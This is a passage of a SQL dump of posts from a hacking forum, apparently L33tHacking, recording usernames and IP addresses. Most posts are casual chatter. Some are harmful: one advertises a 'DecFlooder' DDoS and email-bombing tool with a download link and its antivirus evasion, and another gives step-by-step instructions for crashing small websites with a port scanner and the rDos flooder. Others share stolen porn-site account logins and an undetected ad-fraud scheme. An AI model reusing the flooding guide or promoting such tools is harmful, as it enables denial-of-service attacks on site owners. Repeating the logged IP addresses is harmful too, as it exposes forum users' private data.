'Halloween Logo?', '0', '222', 'Exposé', '1351235974', 'Should L33tHacking have a Halloween logo due to the upcoming holiday? Just a suggestion :p', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '17a30757f033893cfdfd5fddec2df026', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6431', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '257', 'XxTREYZxX', '1351236370', 'This would be nice and cool,and spooky :S', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2cb697932a3b1ecbcb133a231461a3fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6432', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '62', 'R?????zo?', '1351237713', 'I already tried this but it didn\'t turn out good, you can try if you want though.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'bd214bdcf78e2409f6b12fd70a3f40a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6433', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '257', 'XxTREYZxX', '1351237955', 'I agree mate thanks i will not use these neither i have ever used these', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '3911741c56100e926f0c3c9e68fa8de1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6434', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '62', 'R?????zo?', '1351238006', 'My password is not there hehe, nice list.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', '0f39e1ae9ec8577e911117dadf61b6e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6435', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '257', 'XxTREYZxX', '1351238599', 'Mine is ahah no its not i am just plating with you, or am i.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '39061564f40098ddebd2bf6432b1fb0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6436', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '228', 'VirtualLegend', '1351241181', 'You got that idea from Leakforums right? Reload Maybe if you see the logo of leakforums you will get a idea :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '34bcc020744dd71eae9f7acf9c0b2d09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6437', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351241605', 'Both of you are accepted, Welcome to Marketers Bro\'s', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e619c16114647ac05cfe1b43d67fc750', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6438', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351241711', 'I hate Cats, just kidding 6/10', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e498808b7e153e33a870707625d76430', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6439', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '228', 'VirtualLegend', '1351241855', 'lmao My password is 0000 but in a diffrent order :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6187b8f39e7425f9112c0602b8a70633', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6440', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351243860', '7/10 because its colurfull and cool aaha', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '913bcd1a66b94aa0bfa2ed2c0284dd55', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6441', '1107', '0', '15', 'Free] = DecFlooder v1.00 = [Free]', '0', '257', 'XxTREYZxX', '1351249473', 'DecFlooder v1.00 Features: Flooder: • DDoS • Email Bomber • Chat Spammer Viruscan: https://www.virustotal.com/file/92fdaf05...350852503/ SHA256: 92fdaf05ea1081f76bd7f1f661f63b8c1ecbe92017b68d577cd07ab1263c4786 File name: DecFlooder v1.00.exe Detection ratio: 0 / 42 Analysis date: 2012-10-21 20:48:23 UTC ( 53 minute ago ) 00 More details Analysis Comments Votes Additional information Antivirus Result Agnitum - AntiVir - Antiy-AVL - Avast - AVG - BitDefender - ByteHero - CAT-QuickHeal - ClamAV - Commtouch - Comodo - DrWeb - Emsisoft - eSafe - ESET-NOD32 - F-Prot - F-Secure - Fortinet - GData - Ikarus - Jiangmin - K7AntiVirus - Kaspersky - Kingsoft - McAfee - McAfee-GW-Edition - Microsoft - MicroWorld-eScan - Norman - nProtect - Panda - PCTools - Rising - Sophos - SUPERAntiSpyware - TheHacker - TotalDefense - TrendMicro - TrendMicro-HouseCall - VBA32 - VIPRE - ViRobot - Download: [lock]http://www.mediafire.com/?51nzp7h6n8o6mmc[/lock] Credits: To me[NonStOp_] for making the flooder. YTViews v1.00[Made By Me] DecFlooder v1.00[Made By Me] [/color]', '203.104.11.14', '-882373874', '1', '0', '1', '1352010907', '1', 'd7fb16404842bd1379dd6e9e5e817921', '0', '1352010907'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6442', '1108', '0', '12', 'How to Crash Small Websites', '0', '257', 'XxTREYZxX', '1351250715', 'leaked so yeah [color=#32CD32]How to Crash Small Websites TOOLS REQUIRED : Port Scanner : Click Here To Download rDos : Click Here To Download Step One: First we need to find the websites IP Adress. This is very easy todo. Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type pinghttp://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /\'s). EXAMPLE: Step Two: Now we must test to see if port 80 is open (it usually is). This is very easy todo to Ok open up the port scanner you downloaded. Once in the port scanner type in your Victims ip that you got from step 1. It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y. [X] = Closed [X] Vulnerable = Open Step Three: The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!) If port 80 is open your on your way to crashing!! Ok open Up rDos that you download. Enter the ip that we got from step 1. It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work. Hit enter.. *= Flooding -=Crashed Or didn\'t connect! EXAMPLE: The site won\'t be directly offline!! it starts with *********** be patiend.. after some time it will go like this: **********----------- This means the site crashed.[/color]', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '15519f4679055383ca97343665cb205a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6443', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351252514', '4/10. I like Minecraft! :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6742841c62fea76c7a1992881f161fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6444', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '205', 'mothered', '1351252899', 'I believe this Is a good move. It\'ll keep posts and activity happening.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '55e5a5ef6797c704312cf2e00bfc1678', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6445', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '205', 'mothered', '1351253080', 'Yet, so many people use passwords like these. Unbelievable.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd9454dc8cb86e9d271eb3c2872dc065b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6446', '1101', '6409', '49', 'RE: Dumps Section', '0', '61', 'NXK', '1351253187', 'We already have one for premium users only. If you\'d like to check it out feel free to upgrade :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '10a6aafe0f26b522e8f81562b3071985', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6447', '1084', '6311', '4', 'RE: hey guys', '0', '61', 'NXK', '1351253318', 'Welcome, Please try to stay HQ and Enjoy it here :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f974a83ab77d27b6b3b0484c8558d80a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6448', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '67', 'HoverCatz', '1351254102', 'Coding Minecraft 2d .', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '5aab9e0d4f19fa1094b5322c184e4b0e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6546', '1118', '6538', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351455359', '[quote=\'iTzIpod\' pid=\'6538\' dateline=\'1351435065\'] VOUCH. :) [img]http://i.imgur.com/y7OK1.png[/img] Thanks sirchamp. Will you ever consider releasing the program to the public or whatever you\'re using? [/quote] Not anytime soon. Because the more that do it the more likely it is to be detected. I have had 2 payouts so far without getting banned. I hope it\'ll stay undected for a while :D', '102.161.228.158', '1721885854', '1', '0', '0', '0', '1', '1e6a18043e1b8a3adb4716e7b6facbf1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6450', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351254985', '7/10 because your a ipod haha ;o', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'd6639a3c75077a99c94df4ff0ea34f21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6451', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '62', 'R?????zo?', '1351256592', 'Yeah I\'ve seen leakforums logo but I won\'t be doing any halloween logo for LH, I\'m really busy with my job now so I won\'t have time.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'c5f2942612d33538e91dc7c4ee37c762', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6452', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '62', 'R?????zo?', '1351256687', 'Looks good for beginners, thanks for that :)', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', '340e8cb42338b715ab7c6ef81a2fc92c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6453', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351256820', '1/10 for your avatar I like your sig though 9/10 just because it should be smaller :)', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'd3b58b4a95b970bb6d0d5c744c00986c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6454', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '53', 'sirchamp', '1351260555', 'On a normal school day about 2-3 hours. On weekends or other free days up to 10 hours.', '94.2.55.62', '1577203518', '1', '0', '0', '0', '1', '21d38aee967017af8e6b75fcef5a6657', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6455', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '53', 'sirchamp', '1351260587', 'Sit in front of the computer.', '249.106.196.152', '-110443368', '1', '0', '0', '0', '1', 'f83aedd2b23660ff9ea7682ec79c1ced', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6456', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '61', 'NXK', '1351265188', 'I don\'t know if we could get one that would match the theme aha, But if someone wants to give it a try we can see what it looks like.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'c37ae13f48e994ac7959334657265ca8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6457', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '199', 'Anonymous™', '1351269758', '8/10 Nice avatar R?????zo?.', '85.230.51.25', '1441149721', '1', '0', '0', '0', '1', 'd0a1b1e255d3fbaffb4d38a883120d75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6458', '1109', '0', '47', 'free vpn', '0', '255', 'sbhshroy2', '1351271375', 'this VPN (Virtual Private Network) is Designed with the latest technologies and most advanced cryptographic techniques to keep you safe on the internet from prying eyes and hackers by securely routing all your internet traffic through an encrypted tunnel to bypass government censorship, defeat corporate surveillance and monitoring by your ISP. VPNBook strives to keep the internet a safe and free place by providing free and secure PPTP and OpenVPN service access for everyone Features Anonymity, Freedom, Performance, Peace of Mind Built for Performance Our VPN servers are built for speed with their own dedicated hardware. You will immediatley notice that our VPN servers are properly optimized to maximize your speed and browsing experience all while maintaining your privacy online. No Restrictions Unblock any website or service online, we do not block any ports or websites so you can play any games or use any programs and experience the whole of the internet right at your fingertips. Strongest Encryption We understand how important it is for you to be anonymous and secure. All traffic between you and the VPN is encrypted using only the best encryption techniques such as AES-256, to get an idea, it would take the world\'s fastest supercomputer 1000\'s of years to crack this level of encryption. No Bandwidth Limits Enjoy unrestricted speed and unlimited traffic, wether you want to watch a movie, download a torrent or run any traffic intensive apps, we do not restrict speed wether you use 1GB or 100GB of bandwidth in a day. Smart CDN Fallback Providing cloud based I.P CDN components that helps our network intelligently route your traffic via the least congested route to maintain overall network integrity, which results in performance improvement for end-users, and the great part is that there\'s still a local fallback in case of CDN failure. 100% Anonymity With governments and ISP\'s world wide now pushing for mandatory data retention and snooping laws, we place our servers strategically in countries where these such laws do not exist (example: Romania, Switzerland), thus we do NOT log any of your internet browsing traffic, all that is logged is your I.P address and time the connection was made, connection logs are automatically removed every 3 day. click here http://adfoc.us/7433111417963', '14.99.62.44', '241385004', '0', '0', '0', '0', '1', 'd3f6b2ac59d6a766190e6ee0e6a0b949', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6459', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '3', '??????????¢™', '1351272008', 'I think we should but not really because we arent that big yet.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '7328c5a94d3aa407828477e47450454b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6460', '1109', '6458', '47', 'RE: free vpn', '0', '53', 'sirchamp', '1351275258', 'Is this a contest or a giveaway??', '202.209.204.41', '-892220375', '1', '0', '0', '0', '1', 'ebf3f9ec20c5fdb129465f06e67fc840', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6461', '1093', '6341', '7', 'RE: I\'m back', '0', '82', 'iTzIpod', '1351279044', 'Welcome back. I didn\'t realize you were IP Banned. But welcome back either or. Close this thread? @t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c6c202c97531b530993046ff72c4394c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6462', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '82', 'iTzIpod', '1351279266', 'Very nice explanation! Keep up the HQ Content. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b08107be25986dba862dab249111e80b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6463', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351279328', '10/10 Looks Unique and Cool also matches your name in a way. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6033bb474caee8ba6f2067dffc3a632b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6464', '1110', '0', '54', '[27 OKT]Brazzers,Bangbros,Realitykings,...and more WORKING PASSES FOR 27.OKT.2012', '15', '255', 'sbhshroy2', '1351280920', 'http://adfoc.us/7433111419932', '116.203.181.143', '1959507343', '0', '0', '0', '0', '1', '8aa3f370eb5cad90e366cabb11af4dac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6465', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '53', 'sirchamp', '1351282082', 'HF has also got a halloween logo :D It looks pretty nice. I think we should also have one... We have lots of talented, graphic making guys here.', '44.174.182.174', '749647534', '1', '0', '0', '0', '1', 'b3d1eee99aaaa8dd0fa71ad71ac0436b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6466', '1111', '0', '54', '[27 oct]huge collection of porn acounts,more than 50 porn sites acount*no download*', '0', '255', 'sbhshroy2', '1351287012', 'http://tny.cz/e396247a No more quad spam links.', '116.203.181.143', '1959507343', '0', '0', '61', '1351293761', '1', '7b49658aac081f84e7b1f27494dfa254', '0', '1351293761'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6467', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '222', 'Exposé', '1351303493', 'If someone can give me the psd I can make one up quick...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5b479c239dcc2d87d1755290451437e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6468', '1047', '6049', '16', 'RE: Get free Otterbox cases!', '0', '82', 'iTzIpod', '1351303504', 'Update: Hey Expose, I need help SEing it. Or, if only there was some way I can repay you back if you can do it for me?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b485aae45c37f7cf6b01bb66584bdf09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6469', '1093', '6341', '7', 'RE: I\'m back', '0', '2', 'Apathy', '1351305869', 'I was ip banned as well. Nice to see you back.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '26fc1b42f4351f72f2cfda5e2acafae7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6470', '1090', '6329', '8', 'RE: What is this song called?', '0', '205', 'mothered', '1351308542', 'This could be anything. Do you know any parts of the main chorus?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5d692ff9718c1f3904ff9811c15d2dba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6471', '1090', '6470', '8', 'RE: What is this song called?', '0', '257', 'XxTREYZxX', '1351309139', '[quote=\'mothered\' pid=\'6470\' dateline=\'1351308542\'] This could be anything. Do you know any parts of the main chorus? [/quote] Yes this would be very helpfull Do you ?', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '9475f72d2805b2bc1612becec3232f6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6472', '1112', '0', '49', 'SUGGESTION', '0', '257', 'XxTREYZxX', '1351309406', 'hey LH, whats happening, i think there should be a thing where you cant -rep till 50 post +2 rep.To stop rep abuse who agrees :P', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '638d3d815792a76f3244dbc103c13481', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6473', '1093', '6341', '7', 'RE: I\'m back', '0', '3', '??????????¢™', '1351313219', 'I didnt even notice that he was banned.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '3a746bb0afb371c350cfabf5df696a96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6474', '1112', '6472', '49', 'RE: SUGGESTION', '0', '258', 'PiXEL^OG', '1351314643', 'Completely useless , there has not been any rep fucks here so there is no need', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0179ab737918b5cdc4ac6d3e8691fb7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6475', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '258', 'PiXEL^OG', '1351314736', 'Actually , why not make a Halloween theme for l33thacking? that would be awesome ^^', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '77661c1833da60a2cb15eb0c0863bc68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6476', '1113', '0', '54', '[27 0ct]huge collection of premium porn acounts. all checked and working', '17', '255', 'sbhshroy2', '1351315333', 'http://adfoc.us/7433111424432', '14.96.62.29', '241188381', '0', 